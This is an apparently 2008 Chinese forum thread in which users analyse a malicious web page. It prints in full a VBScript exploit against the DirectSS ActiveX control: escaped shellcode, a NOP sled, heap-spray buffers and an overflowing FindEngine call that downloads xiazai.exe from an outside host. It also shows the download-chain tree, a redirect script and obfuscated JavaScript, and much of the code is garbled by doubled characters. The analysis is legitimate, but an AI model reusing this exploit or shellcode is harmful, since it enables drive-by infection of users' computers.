http://kisslangzi.3322.org/css/index.htm

mox

http://kisslangzi.3322.org/css/index.htm

qianwenxiang

应该都是http://kisslangzi.3322.org/css/xiazai.exe

那个S=S+的网页解出来又是S=S+..代码乱七八糟的看不清了，猜测要下载的文件应该跟前面一样的

<HTML>
<OBJECT CLASSID="CLSID:EEEE78591-FE22-11D0-8BEF-0060081841DE"" ID="DIRECTSS"></OBJECT>
<BODY>
<SCRIPT LANGUAGE="VBSCRIPT">
ON EERROR RESUME NEXT
S="%U54EB%U758B%%U8B3C%U3574%U0378%U56F5%U768B%U03220"
S=S+"%U33F5%U49C9%UAD41%UDB33%%U0F36%U14BE%U3828%U74F2"
S=S+"%UUC108%U0DCB%UDA03%UEB40%U3BEF%U75DFF%U5EE7%U5E8B"
S=S+"%U0324%U66DD%%U0C8B%U8B4B%U1C5E%UDD03%U048B%U0388B"
S=S+"%UC3C5%U7275%U6D6C%U6E6FF%U642E%U6C6C%U4300%U5C3A"
S=S+"%%U2E55%U7865%U0065%UC033%U0364%U30440%U0C78%U408B"
S=S+"%U8B0C%U1C700%U8BAD%U0840%U09EB%U408B%U8D34%U7CC40"
S=S+"%U408B%U953C%U8EBF%U0E44E%UE8EC%UFF84%UFFFF%UEC83"
S=S+""%U8304%U242C%UFF3C%U95D0%UBF50%U1AA36%U702F%U6FE8"
S=S+"%UFFFF%U8BFFF%U2454%U8DFC%UBA52%UDB33%U5353%UEEB52"
S=S+"%U5324%UD0FF%UBF5D%UFEE98%U0E8A%U53E8%UFFFF%U83FF"
S=S++"%U04EC%U2C83%U6224%UD0FF%U7EBF%UEE2D8%UE873%UFF40"
S=S+"%UFFFF%UFFF52%UE8D0%UFFD7%UFFFF"
S=S+"%U74688%U7074%U2F3A%U6B2F%U7369%U6C73%U6EE61%U7A67%U2E69%U3333%U3232%U6F2E%UU6772%U632F%U7373%U782F%U6169%U617AA%U2E69%U7865%U0065"
SCODE = UNESCCAPE(S) + NOP
EAX= UNESCAPE("%FF%%13")
EBP= UNESCAPE("%FF%13")
EIPP= UNESCAPE("%01%0A")
JNK= STRING((50,UNESCAPE("%13"))
SUNTZU = STRIING(888,"A") + EBP + EIP + EAX + JNNK
BUFFERI   = STRING(9999999,"X"))
BUFFERII  = STRING(9999999,"Y") BUFFERIII = STRING(9999999,"Z")
BUFFERIV  = STRING(9999999,"O")
EENGINEID= STRING(200000,"B")
MFGNAAME="DEFAULT"
PRODUCTNAME="DEFAULTT"
MODEID= STRING(199544,UNESCAPE(("%90")) + SCODE
MODENAME= SUNTZU LANGUAGEID=1
DIALECT="DEFAULT"
SPEAKER="DEFAULT"
STYLE=1
GENDERR=1
AGE=1
FEATURES=1
INTERFACES==1
ENGINEFEATURES=1
RANKENGINEIDD=1
RANKMFGNAME=1
RANKPRODUCTNAAME=1
RANKMODEID=1
RANKMODENAMEE=1
RANKLANGUAGE=1
RANKDIALECT==1
RANKSPEAKER=1
RANKSTYLE=1
  RANKGENDER=1
RANKAGE=1
RANKFEAATURES=1
RANKINTERFACES=1
RANKEENGINEFEATURES=1
DIRECTSS.FINDENGIINE ENGINEID, MFGNAME, PRODUCTNAME,, MODEID, MODENAME, LANGUAGEID, DIAALECT, SPEAKER, STYLE, GENDER, AGE,, FEATURES, INTERFACES, ENGINEFEATUURES, RANKENGINEID, RANKMFGNAME, RAANKPRODUCTNAME, RANKMODEID, RANKMODDENAME, RANKLANGUAGE, RANKDIALECT,  RANKSPEAKER, RANKSTYLE, RANKGENDERR, RANKAGE, RANKFEATURES, RANKINTERRFACES, RANKENGINEFEATURES
</SCRIPPT>
</BODY>
</HTML>

qianwenxiang

exe链接失效

深红的雪

嗯，都是一样的

[wide]http://kisslangzi.3322.org/css/index.htm
    [script]http://kisslangzi.3322.org/css/lang.js
        [frame]http://kisslangzi.3322.org/real.gif    Not Found
    [frame]http://kisslangzi.3322.org/css/xuan.htm
        [frame]http://kisslangzi.3322.org/css/lang1.htm
            [object]http://kisslangzi.3322.org/css/xiazai.exe
        [frame]http://kisslangzi.3322.org/css/lang5.htm
            [object]http://kisslangzi.3322.org/css/xiazai.exe
        [frame]http://kisslangzi.3322.org/css/lang9.htm
            [frame]http://kisslangzi.3322.org/css/lang.htm
                [script]http://kisslangzi.3322.org/css/lang.js
            [ani]http://kisslangzi.3322.org/css/ani.asp?id=1314
                [object]http://kisslangzi.3322.org/css/xiazai.exe
        [frame]http://kisslangzi.3322.org/css/lang10.htm
            [object]http://kisslangzi.3322.org/css/xiazai.exe

CLSID:EEEE78591-FE22-11D0-8BEF-0060081841DE
这个是什么东西

qianwenxiang

找不到和您的查询 "EEEE78591-FE22-11D0-8BEF-0060081841DE" 相符的网页。

tanlimo

新的漏洞？？？

zzh161

中间有%uu这种的，把那个u去掉，最后的链接里混杂了ascii大于128的，不显示那部分就是正常的hxxp://kisslangzi.3322.org/css/xiazai.exe

那个xiazai.exe是个HTML文档

<html>
<head>
<link rel="stylesheet" type="text/css" href="http://202.106.195.23:6688/aicss_test251.css" />
</head>

<script>
s=String(window.location.href);
mylocal=s.substring(7,s.indexOf('/',7));
t = "http://dm.bbn.com.cn/response.asp?MT=" + mylocal;
document.location.href = t;
</script>

<body></body>
</html>

[ 本帖最后由 zzh161 于 2008-3-1 18:23 编辑 ]

mox

lang.js 乱码?

$="var vip&Otilde;ù&Otilde;éBX1×Date&ccedil;&Iuml;&Ntilde;s&Oacute;&Ntilde;g&Oacute;)+24&Eacute;&Eacute;*1000)é&Ograve;2×&Iacute;&Ecirc;)é&Aring;&Ocirc;&pound;&Oslash;é&Igrave;&Ograve;2[&pound;indexOf&ccedil;&Aring;);òe&oslash;&Auml;al&ntilde;e>'&Iuml;if(&Igrave;=-1){&Ugrave;df&Ugrave;f=&pound;êêfl&Ugrave;&pound;;&Ecirc;&Ocirc;POPWINDOS;e&Egrave;i&Auml;s=&pound;+&Ntilde;&Aacute;GMT&Iacute;);&iuml;ct(&pound;Microsoft.XMLHTTP&pound;))üe&ccedil;'<&Euml;t&oslash;&Egrave;kk.js&pound;></&Euml;T&Iacute;&pound;DPCLIENT.VOD&Acirc;&Aacute;K&Icirc;MPS.S&Aacute;RM&Ccedil;.&Ocirc;&Ucirc;&Egrave;BF&Icirc;E.POWER&Ccedil;&AElig;PPS&Icirc;PDG2&Acirc;&Auml;ADER&Icirc;&Agrave;HAT.&Agrave;HAT&AElig;&Egrave;LZ&Icirc;B&Atilde;BAR.TOO&ETH;B&Atilde;&Ntilde;E&Icirc;E){}}";$0="WINDOW[&pound;DOCUME&iexcl;=UNESCAPE(&pound;%U&iexcl;&THORN;9191&pound;);LOVE&iexcl;ŸNT&pound;][&pound;WRIT&iexcl;&Uuml;E&pound;]('-1;--I)$=$.split($O.charAt(I)).join($0[I]);eval($.replace(/&pound;/g,"\""))

qigang

http://kisslangzi.3322.org/css/xiazai.exe


无法下载！